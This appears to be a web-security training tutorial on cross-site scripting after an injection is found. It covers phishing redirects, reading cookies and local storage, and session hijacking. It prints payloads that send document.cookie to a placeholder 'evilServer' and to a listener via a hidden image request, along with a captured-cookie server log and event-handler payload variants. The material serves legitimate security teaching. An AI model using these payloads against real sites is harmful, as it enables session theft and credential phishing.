Common XSS 'injections'

So, you have found XSS and made an 'alert()' box pop up. Congratulations. What can we do next?

In this article we will look at some of the common XSS Based attacks

• Window Relocation
• Scraping User Information.

Info

For the examples, I have linked scripts directly to the `onClick method of the buttons (otherwise they would trigger automatically)

<button onclick="PAYLOAD">

Window Relocation

For a Phishing style attack we can redirect the current page to elsewhere (for example, a page that looks much like the login page). This may enable us to seize user credentials.

This would use the payload:

<script>window.location="http://127.0.0.1:8000/</script>

To redirect the user to another page that is under our control.

A common use of this is to create an evil version of the sites login page, to harvest user credentials before redirecting back to the intended content.

You can see an example of this by clicking the button below

Click Me to go home

Manipulating Browser Behaviour

As the JavaScript has access to almost anything in the browsers current session, It is also possible to start grabbing data from, or manipulating the behaviour of the browser itself.

For example we can use the following to show the users current set of cookies

<script>alert(document.cookie)</script>

Click Me for Cookies

Or use a payload like this to grab some elements of HTML local storage using

<script>alert(localStorage.key(0)  + " " + localStorage.getItem(localStorage.key(0)))</script>

Click Me for Storage

Redirected Session Jacking

Putting these elements (redirection, and leaking browser information) together gives us another payload.

Rather than use an "alert()" as a payload. We can use XSS to grab another user's session details, then redirect to a target page that gathers the details.

This relies on us using the JavaScript to make a request to another site (one that we own) and appending the session cookie.

Our basic POC (Proof Of Concept Exploit) would make use of the following:

<script>window.location="http://evilServer/?cookie="+document.cookie</script>

In this case we also need a server available to listen for the connection. For testing I like to use a locally hosted server, for example using the one built in to python

#For Python 2
python -m SimpleHTTPServer

#For Python 3
python -m http.server

This means our payload becomes

<script>window.location="http://127.0.0.1:8000/evil.php?cookie="+document.cookie</script>

Note

Remember to use the port your server is listening on.

kali@kali:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [01/Nov/2020 16:08:42] code 404, message File not found
127.0.0.1 - - [01/Nov/2020 16:08:42] "GET /cookie.php?_ga=GA1.1.1899681705.1601546157;%20_hjid=304c63fa-2fd3-4940-9803-d380302c7b07 HTTP/1.1" 404 -
127.0.0.1 - - [01/Nov/2020 16:08:42] code 404, message File not found
127.0.0.1 - - [01/Nov/2020 16:08:42] "GET /favicon.ico HTTP/1.1" 404 -

We can pick out the PHPSESSID cookie, and hijack someone else's session by changing the cookie settings in our browser.

More Subtle session jacking

While a redirect gets us the information we want, having your victims browser hang, or give us a 404 is not very subtle.

Instead we could take a couple of alternative approaches:

• Have a web server show an "error" page. When the user hits the back button (or if we are really cunning hits the link we supply from the 'referer' part of the request) they go back to the main page, hopefully oblivious.
• Get the JS to request the page as part of another object (IE an image). This will then be rendered invisibly (or at worst as an error in the console) on the original page.

One approach to this is to use an image (or similar) as the payload new Image().src="http://192.168.3.1:8000/evil.php?output="+document.cookie; our listener then will then pick up the cookie, and we can again steal their session.

You can try this out by starting a python web server, and clicking the button below

Important

Check my script, to be sure the address is local. Always a good idea to check the source when someone offers to show you a "cool hacking trick"

Send My cookies Remotely

Task

In the Expliot Trainer Try the Reflected XSS Examples. See if you can send using XSS.

Alternatives to script tags

There are several options rather than using <script> tags. These will use the similar payloads to the scripting version. Useful ones include.

What	Payload
onload (happens when the page loads)	\<body onload=(alert();)
Mouse events	\<tag onmouseover=alert()...\</tag>
Errors	\<img src=\"url that does not exist\", onerror=alert()>

Task

Try getting an XSS payload to fire. See if you can grab a session token in using the web trainer Also Try some of the more interesting XSS scripts below.

Further reading

For an Excellent (and somewhat scary) Resource on Payloads see

• XSSPayloads.com

For information on XSS in other template languages (Not just PHP)

• Exploiting XSS Via Markdown